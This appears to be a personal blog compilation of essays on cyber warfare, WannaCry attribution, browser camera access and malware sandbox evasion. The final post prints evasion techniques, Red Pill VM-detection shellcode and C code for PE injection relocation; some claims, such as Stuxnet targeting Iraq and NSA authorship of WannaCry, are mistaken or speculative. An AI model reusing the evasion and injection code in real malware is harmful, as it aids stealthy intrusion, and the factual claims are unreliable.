The other side of the story on cyber attack (Electronic war between countries)

Preface

We have heard that a new age of transformation is coming. As a result, traditional military weapons are being transformed into electronic code. Computer technologies such as DDoS (distributed denial of service), malware and viruses act like a killer. They can disrupt financial activities, daily network communication and health care services. One idea from World War II history is that classic military power destroyed everything (people and property), but society and its operations were rebuilt after the war. That is a harsh and difficult mission! From a technical point of view, the victorious side might, on ethical grounds, assist the defeated side in rebuilding its business and economic system. As a matter of fact, the level of destruction caused by military weapons, especially missiles, is hard to evaluate. And this is the reason cyber warfare will appear in the coming future. But it has started already!

Analytic result on technical articles about cyber warfare

In my study of a technical article issued by the Center for Security Studies (CSS) at ETH Zurich, the analytic result highlights several key factors of cyber warfare. Cyber warfare is cheaper than traditional military force. It provides a "cleaner" situation (with less or no bloodshed). No doubt it is less risky for an attacker than other forms of armed conflict. The study defines five different types of cyber conflict: cyber war, cyber terrorism, cyber espionage, internet crime and cyber vandalism.

The specific feature of cyber weapon (in between country to country)

I was sometimes confused by headline news predicting a cyber technology war. The question on my mind is how an electronic weapon or cyber weapon replaces traditional military facilities. Thinking it over, the appropriate technique might be matched to a target according to the following criteria (see below):

The capabilities of cyber attack techniques ( A transformation of traditional military force)

Type | Attack technology | Functional feature – objective | Target – Environment | Remark
Cyber Vandalism, Cyber War | IoT & botnet (DDoS technique) | Services suspension – electronic communication services (IP telephony) | Bank, fund house, stock exchange |
Cyber Espionage | Malware | Information gathering | Bank, fund house, stock exchange & government sector |
Cyber War, Cyber Vandalism | Ransomware | Services suspension of an important facility function | Nuclear facility, airlines, TV broadcast station, radio broadcast station & military facility | Ransomware contains features to suspend computer services. Besides, it is capable of listening to instructions from a C&C server. On the other hand, the attacker can resume the services once they win the battle.
Traditional military force | Bomb | Services suspension of an important facility function, destroyed permanently | Nuclear facility, military facility, power station, airport & communication facility (digital phone system) |
Internet Crime, Cyber War | Email phishing and scam email messages | Carry out psychological warfare, implant malware activities in order to fulfil their objective | Nuclear facility, military facility, power station |

Let us dig into one of the attack techniques to see how the cyber technology features fulfil the goals of cyber warfare.

Do you think ransomware was founded by a military department?

The first ransomware appeared in the world in 1989. A biologist, Joseph L. Popp, sent 20,000 infected diskettes labeled
"AIDS Information – Introductory Diskettes" to attendees of the World Health Organization's international AIDS conference.
After 90 reboots, the Trojan hid directories and encrypted the names of the files on the customer's computer.
To regain access, the user would have to send $189 to PC Cyborg Corp. at a post office box in Panama.

In 2006, former President George W. Bush was increasingly worried about Iranian efforts at enriching uranium and, ultimately, its hopes to build an atomic bomb. The goal of Stuxnet, driven by the US government, was to destroy Iraq nuclear facilities. Rumors said the Stuxnet malware destroyed roughly one-fifth of Iran's centrifuges in 2009.

Unconfirmed information stated that there was a separate operation called Nitro Zeus, which gave the US access into Iran's air defense systems so it could not shoot down planes, its command-and-control systems so communications would go dead, and infrastructure like the power grid, transportation, and financial systems.

Speculation:

WannaCry infects using EternalBlue, an exploit of the Windows Server Message Block (SMB) protocol. The U.S. National Security Agency (NSA) had discovered the vulnerability in the past, but used it to create an exploit for its own offensive work rather than report it to Microsoft. As we know, the control system OS platforms of nuclear power facilities rely on Microsoft OS (see the articles below). It may cause people to wonder whether there is any secret action hidden by the NSA (National Security Agency). It aroused my interest in questioning who the key figure is behind the spread of WannaCry ransomware. It looks like there is a similarity with the Stuxnet worm infection in 2009. Were we all fooled by the NSA at that time, letting our computer workstations be transformed into a cyber army that then attacks the USA's enemies? Do you think WannaCry is a rehearsal, test or pilot run?

Malware vs. nuclear power: do you think the SCADA system is the culprit in an attack on a nuclear power system?

The diagram below is my imagination of a modern nuclear facility environment. The SCADA system plays a key role in a nuclear power facility. Ransomware has the capability to suspend the services of this facility. It does not need to destroy anything, but the services will be totally shut down. We have seen a real example in the UK health care services as a reference. I will stop writing here. Should you have any queries, I will try my best to write more in future.

Supplement – The other side of the story on cyber attack (Electronic war between countries) – 13th June 2017

As said in the discussion topic above, it looks like the topic did not interest visitors, judging by the comments and feedback. However, there is something on my mind I need to share.

North Korean President Kim's intention is to show the world his governance power. He frequently demonstrates his military power, which causes the US government concern about his attempt to equalize military power in the world. To be honest, it is hard to equal the military and economic power as of today. For instance, China has nearly become the number one business economic leader. We all know the United States is the leader at this moment. However, their economic operation chain should have difficulties doing the second round of transformation, because some of their capital business and business economy contain made-in-China elements. Since North Korea is weak in finance and business economy, what President Kim did seems not to make sense. I did not visit North Korea, however a lot of news on TV might speculate about their current situation. I strongly believe that their nuclear facility might operate in a 1960s fashion. The SCADA system could not possibly be supplied by Siemens, but learning and developing a Windows-based SCADA system is not difficult. From an information point of view, North Korean nuclear facilities might rely on Windows for control systems instead of Linux. And therefore a ransomware-type attack can specifically hit the target. Meanwhile, business and industry in North Korea all work with Microsoft OS in daily life.

The WannaCry infection status was not issued by the North Korean government. But for sure a WannaCry-type infection can suspend North Korean business, finance and industry operations.

Below are the hints on how to eliminate the risks, as issued by a SCADA system vendor. Any interest?

Process control vendors require:
1. A system with a minimal attack surface, so that biweekly or monthly patches are not required
2. A consistent programming interface that will not change every four to five years, requiring a complete rewrite of their software
3. An environment that can be quickly and safely “locked down” to reduce the risk from hacking
4. A system with limited network access, only through specific ports to reduce the risk of network based attacks
5. Support for priority-based multi-tasking, preferably a real-time operating system (RTOS) that supports hard real-time requirements
6. A robust ecosystem of utilities and tools to make development, installation, debugging, and maintenance as easy as it is on consumer systems.

End of this topic

Must be aware during web surfing – protect your personal privacy – turn off your camera in the web browser

Preface:

What is our objective in discussing this topic today? Our goal is to protect user privacy. As we know, internet traffic is under surveillance. This activity is not limited to China nowadays. It includes the major leading countries in Europe, England and the USA.

Situation in China

A country like China makes a clear announcement. The Chinese government has stated that all internet traffic in China is under surveillance, and thus they built the Great Wall (firewall). Tianhe-1 and Tianhe-2 (Milkyway-2) are capable of taking on this responsibility.

2016 Supercomputer magazine

Situation in the United States

What about the status of the surveillance program of the NSA (National Security Agency)? The NSA's official announcement was that, after a comprehensive review of mission needs, current technological constraints, United States person privacy interests, and certain difficulties in implementation, NSA has decided to stop some of its activities conducted under Section 702. For more details, please find the URLs below for reference:

NSA Statement: NSA Stops Certain Section 702 "Upstream" Activities

https://www.nsa.gov/news-features/press-room/statements/2017-04-28-702-statement.shtml

NSA Stops Certain Foreign Intelligence Collection Activities Under Section 702

https://www.nsa.gov/news-features/press-room/press-releases/2017/nsa-stops-certain-702-activites.shtml

NSA Transparency Report: The USA FREEDOM Act Business Records FISA Implementation – 15 January 2016

https://www.nsa.gov/about/civil-liberties/reports/assets/files/UFA_Civil_Liberties_and_Privacy_Report.pdf

The items above give people an idea that our communications (electronic or not) are under surveillance. A positive way of thinking tells yourself that such policies are meant to fight crime. Apart from that, are you aware of your personal privacy, especially your mobile phone camera (lens)? We have learned more secrets about mobile phones recently. The execution of JavaScript or HTML5 allows access to your mobile phone camera from Chrome (example shown below):

Enabling camera and microphone in a packaged application for Chrome OS

var mediaStream;

// Request both audio and video; on success the MediaStream is kept for later use
navigator.webkitGetUserMedia({ audio: true, video: true },
    function (stream) {
        mediaStream = stream;
    },
    function (error) {
        console.error("Error trying to get the stream:: " + error.message);
    });

Remark: Audio and video for a <webview>-embedded page require permission, which will alert the mobile phone owner. A software developer hinted that the required permission might be embedded as audioCapture and videoCapture in the permissions of manifest.json. The mobile phone user might not be aware.

Below is HTML5 code which allows selecting the source and passing it as an optional constraint into getUserMedia. This function is available in the Chrome web browser.

Step 1: Select source

MediaStreamTrack.getSources(gotSources); // gotSources(sourceInfos) receives each source's kind ('audio'/'video') and id

Step 2: pass it in as optional into getUserMedia

var constraints = {
  audio: {
    optional: [{sourceId: audioSource}]   // id of the audio source chosen in step 1
  },
  video: {
    optional: [{sourceId: videoSource}]   // id of the video source chosen in step 1
  }
};

function successCallback(stream) {
  mediaStream = stream;                  // the stream carries the selected audio and video tracks
}

function errorCallback(error) {
  console.error("getUserMedia error: " + error.name);
}

navigator.getUserMedia(constraints, successCallback, errorCallback);

Step 3: Put the permissions in manifest.json or manifest.xml. The mobile phone user might not be aware.

The audio and video capture functions above only need a little reverse engineering to be transformed into other kinds of functions that receive your personal photos. Are you aware of it?
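One way to check what a packaged app asks for before trusting it is to audit its manifest.json for the permissions named above. This is an added example, not code from the original post; the sample manifest is constructed, and the list of permission names treated as sensitive is this example's own assumption.

```python
"""Audit a Chrome packaged-app manifest for camera/microphone permissions.

Added example, not the article's code. SAMPLE_MANIFEST is constructed; the
SENSITIVE table is an assumption listing the permissions the text discusses.
"""
import json

# Permission names that grant capture hardware or embedded-page access (assumed list)
SENSITIVE = {
    "audioCapture": "microphone",
    "videoCapture": "camera",
    "webview": "can embed arbitrary web pages in a <webview>",
}

# Constructed sample manifest.json, shaped like a packaged app's manifest
SAMPLE_MANIFEST = """
{
  "name": "Sample Camera App",
  "version": "1.0",
  "manifest_version": 2,
  "app": { "background": { "scripts": ["background.js"] } },
  "permissions": [
    "storage",
    "audioCapture",
    "videoCapture",
    "webview",
    { "socket": ["tcp-connect:*:*"] }
  ],
  "optional_permissions": ["geolocation"]
}
"""


def _names(entries):
    """Permission entries are either strings or single-key objects such as
    {"socket": [...]}; normalise both forms to the bare permission name."""
    names = []
    for e in entries or []:
        if isinstance(e, str):
            names.append(e)
        elif isinstance(e, dict):
            names.extend(e.keys())
    return names


def audit_manifest(text):
    """Return the sensitive permissions declared, split by whether they are granted
    at install time ("permissions") or requested later ("optional_permissions")."""
    m = json.loads(text)
    report = {"install_time": {}, "optional": {}}
    for key, bucket in (("permissions", "install_time"),
                        ("optional_permissions", "optional")):
        for name in _names(m.get(key)):
            if name in SENSITIVE:
                report[bucket][name] = SENSITIVE[name]
    return report


def findings(report):
    """Human-readable warnings. The webview + capture combination is the case the
    remark above describes: the app can approve camera/microphone requests raised
    by pages it embeds, so the grant reaches content the user never saw."""
    granted = set(report["install_time"])
    out = ["install-time grant: %s (%s)" % (n, SENSITIVE[n]) for n in sorted(granted)]
    if "webview" in granted and granted & {"audioCapture", "videoCapture"}:
        out.append("webview present: embedded pages may obtain camera/microphone "
                   "through the app's own grant")
    return out


if __name__ == "__main__":
    for line in findings(audit_manifest(SAMPLE_MANIFEST)):
        print(line)
```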

Summary:

Refer to the information above. It looks like we need to spend more effort to close the back door on your mobile phone, right? But the easy way from the end user's side is to just disable the camera in your mobile phone browser, or just use a sticker to cover it. It is straightforward, bye!

Modern Sherlock Holmes – Find out the (malware & ransomware) perpetrators.

Preface:

A scientific concept guides human beings to hypothesize boldly and to test rigorously. It looks to me that this concept is a principle, but I believe that more terms can enrich our technology life. For example, carry the "don't care" term in your development and thinking. That is, even though it was unsuccessful, you will receive knowledge. You will dig out more under these circumstances.

Remark: The don't-care term also applies to boolean expressions. Maybe you think that this is a little bit of a side track, right? But we are in the cyber world. In digital logic, a don't-care term for a function is an input sequence (a series of bits) for which the function output does not matter.

OK, let's go to the subject matter today. How do we imagine Sherlock Holmes would study a cybercrime and find out the (malware & ransomware) perpetrator?

Perform investigation

From digital forensic point of view, the investigation will focus on the following objectives:

Capturing a Live RAM dump
Acquiring a Disk Image
Discovering and Analyzing Evidence
Creating Reports

I am not going to suggest that we engage in a real exercise now. It is not a good idea to execute this job without preventive controls. Running in a rush without preparation carries an inherent risk of harm to your machine and personal data. So we step back and take a hot example (WannaCry) to see whether we can dig out more ideas and information.

Observation Point 1 – Languages

Since we are not going to do a forensic investigation, we simply walk through an example (WannaCry) of language setup. From the language setup capabilities (see below), it looks like it covers languages from all around the world.

Criminal psychology

From a criminal psychology point of view, it looks like the criminals are not going to specify a particular target. From a high-level point of view, they are looking for money. A fully compatible language set benefits their objective.

Observation Point 1.1 – Written language and grammar

From a detection point of view, the written language and grammar can provide hints to the detective. These hints may suggest the direction of the detection. For example: the fundamental limitations of translating one's mother tongue into another native language.

Weakness of this detection method:

Such detection might be fooled by a criminal group that intends to interfere with the direction of the investigation.

Observation Point 2 – Malware writing technique:

Sometimes the programming style and infection technique might provide hints that point the detective in the right direction. But a lot of the time they will interfere with the direction of the investigation. For example: WannaCry relies on the NSA (DoublePulsar) backdoor software agent or the SMB v1 vulnerability (see the picture below) to execute its task. Under normal circumstances, a bad guy will implant a backdoor on the victim machine to fulfil the infiltration task. Unfortunately the backdoor software (DoublePulsar) came from the NSA's global surveillance program. WannaCry is ransomware, in the sense that the NSA might not be the perpetrator. As a result it interrupts the trace process. The investigator cannot follow the hints to predict who is the appropriate party behind this criminal job.

Observation Point 3 – Down to the grove, execute forensic investigation

Since the observation items above might contain fundamental weaknesses, those items of evidence might still become relevant evidence. The fundamental theory in the law of relevant evidence is that the relevant part of the evidence "is logically connected to the fact it is intended to establish" (Blackwell, 2004). However, the investigator or detective will most likely prefer to execute a forensic investigation to obtain digital and demonstrative evidence.

Technical limitation of the forensic investigation

We know that the WannaCry ransomware infection crisis suspended health care services in the United Kingdom. The major effect harmed the whole hospital service over there! Since healthcare services maintain compliance standards, it is possible to let the forensic investigator do the investigation (see the steps below).

1. Capturing a Live RAM dump
2. Acquiring a Disk Image
3. Discovering and Analyzing Evidence
4. Creating Report

However, a technical limitation has been found in the traditional digital forensic investigation criteria.

Some evidence will be lost once the victim powers off their machine.
A victim with technical know-how will erase some evidence.
Audit logging is disabled by default.

Advanced technology addresses the limitations of the investigation algorithm

Technology companies noted this technical weakness in forensic investigation. A preventive mechanism was built to avoid the loss of critical data after system power-off. The enhancement is that a software agent is installed on the workstations. The software agent collects the delta (data changes) and forwards it to a centralized repository in real time.

As we know, no design or solution is perfect. This enhancement is perfect to implement in an enterprise or corporate environment. For workstations in personal use it is difficult to implement. A drawback alerts the detective or government enforcement team that there is a technical limitation on personal devices (personal computer workstations, mobile computing devices and IoT devices).

Multi-angle detection architecture

Readers, if you have read this far, we know the investigation mechanism mentioned is able to collect the following details.

(1) Memory dump, (2) disk image, (3) malware activities finger print, (4) virus and malware types, (5) C&C server public IP address and (6) malware dropper file.

Even though we have the above information on hand, it is hard to provide comprehensive evidence proving who the perpetrator is! For example, it is hard to collect detailed information once a workstation is compromised by WannaCry, as the whole disk has been encrypted. So, what is the next step when an investigator faces this problem?

Referring to the picture below, you might notice that point C (C&C server) and point D (victim compromised web server) are located in different regions. They are not in a single operation. Even though forensic investigators are able to decrypt the hard disk or collect the activity log from their SIEM device, the trace result sometimes misleads about the location of the area. It is hard to provide a clear picture. In order to identify the root sources, a detection approach, so called the multi-angle detection algorithm, will assist investigators in such circumstances.

The concept is that the investigator will summarize the following entities.

1. Total number of C&C servers and their IP addresses
2. Total number of victims (compromised web servers) and their IP addresses
3. Categorize the IP addresses and highlight the IP address region

Remark: As we know, hackers rely on the Tor network to hide themselves effectively. It is hard to know their location once their connection gets inside the onion network (Tor network).

4. Execute a forensic investigation on the compromised server (Point D)

5. Find out the C&C server connectivity (Point C)

6. Sometimes the law enforcement team does not let the hacker know they have been traced. The job might run on the ISP side (Point B). For instance, they will lock down the appropriate Tor certificate and filter the certificate Issuer and Subject ID patterns.

7. Since two important elements (Tor cert and C&C server public IP address) are known, it is easier to do the following to find out the attacker's source IP address:

a. Define a correlation rule to find the source IP address of the attacker.

b. Apply Google analytics methodology to figure out the attacker's IP address.

8. The final action is to activate the local police force to arrest the hacker.
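Steps 1 to 3 and the correlation rule of step 7a can be mechanised over SIEM exports. The script below is an added example, not part of the original post: the beacon log lines and the region table are constructed (documentation address ranges stand in for a GeoIP database), and it flags each C&C/victim pair whose two ends sit in different regions, which is the situation the picture describes for points C and D.

```python
"""Multi-angle summary of C&C servers and victims (added example, not the post's code).

SAMPLE_LOG and REGION_TABLE are constructed; a real run would read a SIEM export and
resolve regions with a GeoIP database (assumption).
"""
import ipaddress
import re
from collections import defaultdict

# Constructed beacon log: compromised web server (point D) talking to a C&C server (point C)
SAMPLE_LOG = """\
2017-05-13T02:11:09Z victim=192.0.2.10 cnc=198.51.100.7 action=beacon
2017-05-13T02:12:41Z victim=192.0.2.10 cnc=198.51.100.7 action=beacon
2017-05-13T02:15:03Z victim=192.0.2.44 cnc=203.0.113.5 action=beacon
2017-05-13T03:01:57Z victim=203.0.113.200 cnc=203.0.113.5 action=beacon
2017-05-13T03:07:22Z victim=192.0.2.44 cnc=203.0.113.5 action=download
"""

# Constructed region table (documentation prefixes only); stands in for a GeoIP lookup
REGION_TABLE = {
    ipaddress.ip_network("192.0.2.0/24"): "Region-A",
    ipaddress.ip_network("198.51.100.0/24"): "Region-B",
    ipaddress.ip_network("203.0.113.0/24"): "Region-C",
}

LINE_RE = re.compile(r"victim=(\S+) cnc=(\S+)")


def region_of(ip):
    """Step 3: map an address to its region, 'unknown' when no prefix matches."""
    addr = ipaddress.ip_address(ip)
    for net, name in REGION_TABLE.items():
        if addr in net:
            return name
    return "unknown"


def summarize(log_text):
    """Steps 1 and 2: distinct C&C servers and victims, each tagged with a region."""
    cnc_to_victims = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue                      # skip lines that are not beacon records
        victim, cnc = m.groups()
        cnc_to_victims[cnc].add(victim)
    victims = set().union(*cnc_to_victims.values()) if cnc_to_victims else set()
    return {
        "cnc_count": len(cnc_to_victims),
        "victim_count": len(victims),
        "cnc_regions": {c: region_of(c) for c in cnc_to_victims},
        "victim_regions": {v: region_of(v) for v in victims},
        "cnc_to_victims": {c: sorted(vs) for c, vs in cnc_to_victims.items()},
    }


def cross_region_pairs(summary):
    """Step 7a correlation rule: (victim, cnc) pairs whose ends lie in different regions,
    i.e. the C and D points that are not part of one local operation."""
    flagged = []
    for cnc, victims in summary["cnc_to_victims"].items():
        for v in victims:
            if summary["cnc_regions"][cnc] != summary["victim_regions"][v]:
                flagged.append((v, cnc))
    return sorted(flagged)


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("C&C servers:", s["cnc_count"], "victims:", s["victim_count"])
    for victim, cnc in cross_region_pairs(s):
        print("cross-region pair:", victim, region_of(victim), "->", cnc, region_of(cnc))
```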

Summary:

Regarding the description above, it looks like it is not easy to pin down the hacker's actual location. I have heard that some security experts rely on English writing skill or the C&C server to predict the attacker's source IP address. From a technical point of view, it might contain distortion.

Modern Malware intelligence

Preface:

More people have paid attention to the cyber security world this year, with the tremendous cyber security incidents known as the ATM thieves, the NSA scandal, the IoT DDoS and recently the WannaCry ransomware incident. There are more, but I forget them. Those incidents have common criteria: the culprits behind the infection techniques are given by malware technology.

Evolution

Before the term malware was introduced by Yisrael Radai in 1990, malicious software was referred to as computer viruses. A conceptual idea categorizes malware into the following elements: trojan horses, worms, spyware, rootkits and botnets. For more details, please refer to the diagram below.

Defense

How modern techniques fight against malware:

Preventive control mechanism

Address Space Layout Randomization (ASLR):

This feature randomizes how and where important data is stored in memory, making it more likely that attacks that try to write directly to system memory will fail because the malware cannot find the specific location it needs.

Data Execution Prevention (DEP):

This feature substantially reduces the range of memory in which code can run.

How malware breaks the ice

Evasion technique against Sandbox

Evasion technique 1:

To avoid sandbox detection – refresh the malware body (executable file) frequently so that its checksum (hash) changes; this helps to avoid signature-based antivirus detection.

Evasion technique 2:

Malware can search through physical memory for strings; a new generation of malware commonly uses this to detect memory artifacts. For instance, by default Metasploitable's network interfaces are bound to the NAT and host-only network adapters, and the image should never be exposed to a hostile network (this is the vulnerability of Metasploitable; they fixed it already). Malware contains intelligence to detect sandbox status. No activity will be taken once a sandbox has been detected.

Evasion technique 3:

A sandbox might use a pipe \\.\pipe\cuckoo for communication between the host system and the guest system. Malware can request the file to detect the virtual environment.

Evasion technique 4:

Since open source applications are popular in the IT world, a lot of security analysts build their own sandbox. Cuckoo sandbox deployments cover a certain percentage of them. Meanwhile malware enhances its intelligence: it can detect the Cuckoo agent. Cuckoo uses a Python agent to interact with the guest. By listing the processes and finding python.exe or pythonw.exe, or by looking for an agent.py on the system, malware can detect Cuckoo.

Evasion technique 5:

Most modern workstations have at least 4GB or more memory installed. Malware developers build in the intelligence that machines with less memory may be a sandbox setup.

Evasion technique against virtual machine environments

Red Pill

Red Pill is a technique to detect the presence of a virtual machine. The code shown below can be used to detect whether the code is executed under a VMM or in a real environment.

Red Pill developed by Joanna Rutkowska

Swallowing the Red Pill is more or less equivalent to the following code (returns non-zero when in the Matrix):

    int swallow_redpill () {
        /* rpill holds "sidt [addr]; ret"; the 4 operand bytes are patched below */
        unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";
        *((unsigned*)&rpill[3]) = (unsigned)m;  /* point the operand at m */
        ((void(*)())&rpill)();                  /* run it: m receives the 6-byte IDTR (limit, base) */
        return (m[5]>0xd0) ? 1 : 0;             /* m[5] is the high byte of the IDT base */
    }

Remark: The SIDT instruction (encoded as 0F 01 0D [addr]) can be executed in non-privileged mode (ring 3), but it returns the contents of a sensitive register used internally by the operating system.

Theory: The virtual machine monitor must relocate the guest's IDTR to avoid a conflict with the host's IDTR. Since the virtual machine monitor is not notified when the virtual machine runs the SIDT instruction, the IDTR of the virtual machine is returned. Thereby the process gets the relocated address of the IDT table. It was observed that on VMware the relocated address of the IDT is at 0xffXXXXXX, while on Virtual PC it is 0xe8XXXXXX.

No Pill (Store Global Descriptor Table – SGDT & Store Local Descriptor Table – SLDT)

The SGDT and SLDT instruction technique for VMware detection is commonly known as No Pill. The No Pill technique relies on the fact that the LDT structure is assigned to a processor, not an operating system. The LDT location on a host machine is zero, while on a virtual machine it is non-zero.

Evasion technique: especially POS systems

Malware uses a smart way to evade the sandbox. The method is to use hashes in place of API names, and a table of hash values to keep certain processes from being parsed by the sandbox.

Intangible attacks benefit evasion of sandbox detection

We alert ourselves that malware most likely uses the methods below to avoid antivirus or sandbox detection.

  • Hide the code which may be recognized as malicious. This is generally done using encryption.
  • Code the decryption stub in such a way it is not detected as a virus nor bypassed by emulation/sandboxing.

However, we know that there are intangible attacks on the internet. Such a work style of attack helps malware avoid sandbox detection.

PE inject:

PE injection looks more powerful than the classic code injection technique, as it does not require any shellcoding knowledge. The malicious code can be written in regular C++ and relies on well-documented Windows system and runtime APIs. Compared to DLL injection, the main asset of PE injection is that you do not need several files: the custom malicious code injects itself inside another normal process, and therefore it might be possible to bypass detection.

Example for reference:

A hacker compromises a web site and lures the visitor to visit the web page. During the visit, a message alerts the visitor that, in order to display the content correctly, they need to download a font. From a technical point of view, antivirus might detect the malicious download if it is a known virus. Otherwise the malware can execute the following actions:

Socket creation and network access
Access to filesystem
Create threads
Access to system libraries
Access to common runtime libraries

How does malware complete the job?

Calculate the amount of memory (needed to allocate)

    /* Get image of current process module memory */
    HMODULE module = GetModuleHandle(NULL);
    /* Get module PE headers */
    PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)((LPBYTE)module + ((PIMAGE_DOS_HEADER)module)->e_lfanew);
    /* Get the size of the code we want to inject */
    DWORD moduleSize = headers->OptionalHeader.SizeOfImage;
Calculate the new addresses to set in the distant process

    /* distantModuleMemorySpace is the memory reserved in the target process (obtained elsewhere) */
    /* delta is offset of allocated memory in target process */
    DWORD_PTR delta = (DWORD_PTR)((LPBYTE)distantModuleMemorySpace - headers->OptionalHeader.ImageBase);
    /* olddelta is offset of image in current process */
    DWORD_PTR olddelta = (DWORD_PTR)((LPBYTE)module - headers->OptionalHeader.ImageBase);
The relocation data directory is an array of relocation blocks which are declared as IMAGE_BASE_RELOCATION structures.

    typedef struct _IMAGE_BASE_RELOCATION {
        ULONG VirtualAddress;   /* page RVA the descriptors of this block apply to */
        ULONG SizeOfBlock;      /* size of the header plus all its 16-bit descriptors */
    } IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;
Relocation data directory layout:

    +--------------------------------------------------+--------------------------------+
    | Relocation Block 1                               | Relocation Block 2             |
    | VAddr | SizeOfBlock | desc1 | desc2 | desc3 | ...| VAddr | SizeOfBlock | desc1 |...|
    | 32b   | 32b         | 16b   | 16b   | 16b   |    | 32b   | 32b         | 16b   |   |
    +--------------------------------------------------+--------------------------------+

Walk the relocation descriptors in all relocation blocks and, for each descriptor, modify the pointed address to adapt it to the new base address in the distant process

    DWORD i;
    /* tmpBuffer is a buffer of moduleSize bytes (allocated elsewhere) that receives the relocated copy */
    /* Copy module image in temporary buffer */
    RtlCopyMemory(tmpBuffer, module, moduleSize);
    /* Get data of .reloc section */
    PIMAGE_DATA_DIRECTORY datadir = &headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    /* Point to first relocation block copied in temporary buffer */
    PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)(tmpBuffer + datadir->VirtualAddress);
    /* Browse all relocation blocks */
    while (reloc->VirtualAddress != 0)
    {
        /* We check if the current block contains relocation descriptors, if not we skip to the next block */
        if (reloc->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION))
        {
            /* We count the number of relocation descriptors */
            DWORD relocDescNb = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
            /* relocDescList is a pointer to first relocation descriptor */
            LPWORD relocDescList = (LPWORD)((LPBYTE)reloc + sizeof(IMAGE_BASE_RELOCATION));
            /* For each descriptor */
            for (i = 0; i < relocDescNb; i++)
            {
                if (relocDescList[i] > 0)
                {
                    /* Locate data that must be relocated in buffer (data being an address we use pointer of pointer) */
                    /* reloc->VirtualAddress + (0x0FFF & (list[i])) -> add bottom 12 bits to block virtual address */
                    DWORD_PTR *p = (DWORD_PTR *)(tmpBuffer + (reloc->VirtualAddress + (0x0FFF & (relocDescList[i]))));
                    /* Change the offset to adapt to injected module base address */
                    *p -= olddelta;
                    *p += delta;
                }
            }
        }
        /* Set reloc pointer to the next relocation block */
        reloc = (PIMAGE_BASE_RELOCATION)((LPBYTE)reloc + reloc->SizeOfBlock);
    }

Once the code is injected, the hacker can attempt to call its functions.
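For an analyst the useful skill is reading the .reloc layout above rather than writing an injector, so here is an added example (not the article's code) that parses constructed relocation blocks exactly as the C loop does: the descriptor's top 4 bits are the relocation type, the bottom 12 bits are added to the block's VirtualAddress, ABSOLUTE entries are padding, and rebasing is the `*p -= olddelta; *p += delta` step applied to each fixup. The image bytes, RVAs and base addresses are all constructed for the demonstration.

```python
"""Parse and apply a PE .reloc directory (added example, not the article's code).

All image bytes are constructed inline. Type values follow the PE specification:
IMAGE_REL_BASED_ABSOLUTE = 0 (padding), HIGHLOW = 3 (32-bit), DIR64 = 10 (64-bit).
"""
import struct

IMAGE_REL_BASED_ABSOLUTE = 0
IMAGE_REL_BASED_HIGHLOW = 3
IMAGE_REL_BASED_DIR64 = 10
BLOCK_HEADER = struct.Struct("<II")   # IMAGE_BASE_RELOCATION: VirtualAddress, SizeOfBlock


def parse_reloc_directory(data, offset):
    """Walk the relocation blocks starting at `offset`, mirroring the C loop above.

    Returns a list of (rva, reloc_type) for every non-padding descriptor. Stops at a
    block whose VirtualAddress is 0, a malformed SizeOfBlock, or the end of the buffer."""
    fixups = []
    while offset + BLOCK_HEADER.size <= len(data):
        vaddr, size = BLOCK_HEADER.unpack_from(data, offset)
        if vaddr == 0 or size < BLOCK_HEADER.size:
            break
        n_desc = (size - BLOCK_HEADER.size) // 2           # sizeof(WORD)
        descs = struct.unpack_from("<%dH" % n_desc, data, offset + BLOCK_HEADER.size)
        for d in descs:
            rtype = d >> 12            # top 4 bits: relocation type
            page_off = d & 0x0FFF      # bottom 12 bits: offset inside the 4 KiB page
            if rtype == IMAGE_REL_BASED_ABSOLUTE:
                continue               # alignment padding, nothing to patch
            fixups.append((vaddr + page_off, rtype))
        offset += size
    return fixups


def apply_relocations(image, fixups, image_base, new_base):
    """Rebase the absolute addresses in `image` (a bytearray indexed by RVA) from
    image_base to new_base; this is what `*p -= olddelta; *p += delta` achieves."""
    delta = new_base - image_base
    for rva, rtype in fixups:
        if rtype == IMAGE_REL_BASED_HIGHLOW:
            (val,) = struct.unpack_from("<I", image, rva)
            struct.pack_into("<I", image, rva, (val + delta) & 0xFFFFFFFF)
        elif rtype == IMAGE_REL_BASED_DIR64:
            (val,) = struct.unpack_from("<Q", image, rva)
            struct.pack_into("<Q", image, rva, (val + delta) & 0xFFFFFFFFFFFFFFFF)
        else:
            raise ValueError("unsupported relocation type %d at RVA 0x%x" % (rtype, rva))
    return image


def build_sample_image():
    """Constructed 32-bit image: three absolute pointers in the page at RVA 0x1000 and
    one .reloc block at RVA 0x2000 describing them, padded with an ABSOLUTE entry."""
    image_base = 0x400000
    image = bytearray(0x3000)
    struct.pack_into("<I", image, 0x1004, image_base + 0x1500)
    struct.pack_into("<I", image, 0x1010, image_base + 0x2800)
    struct.pack_into("<I", image, 0x1020, image_base + 0x1000)
    descs = [(IMAGE_REL_BASED_HIGHLOW << 12) | 0x004,
             (IMAGE_REL_BASED_HIGHLOW << 12) | 0x010,
             (IMAGE_REL_BASED_HIGHLOW << 12) | 0x020,
             (IMAGE_REL_BASED_ABSOLUTE << 12) | 0x000]   # keeps SizeOfBlock 4-byte aligned
    block = BLOCK_HEADER.pack(0x1000, BLOCK_HEADER.size + 2 * len(descs))
    block += struct.pack("<%dH" % len(descs), *descs)
    block += BLOCK_HEADER.pack(0, 0)    # terminator matching the `VirtualAddress != 0` test
    image[0x2000:0x2000 + len(block)] = block
    return image, image_base


def demo(new_base=0x10000000):
    """Parse the constructed directory, rebase a copy, and return the results."""
    image, image_base = build_sample_image()
    fixups = parse_reloc_directory(image, 0x2000)
    rebased = apply_relocations(bytearray(image), fixups, image_base, new_base)
    values = [struct.unpack_from("<I", rebased, rva)[0] for rva, _ in fixups]
    return fixups, values


if __name__ == "__main__":
    for (rva, rtype), val in zip(*demo()):
        print("fixup at RVA 0x%04x type %d -> 0x%08x" % (rva, rtype, val))
```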

Overall comment on the above matter:

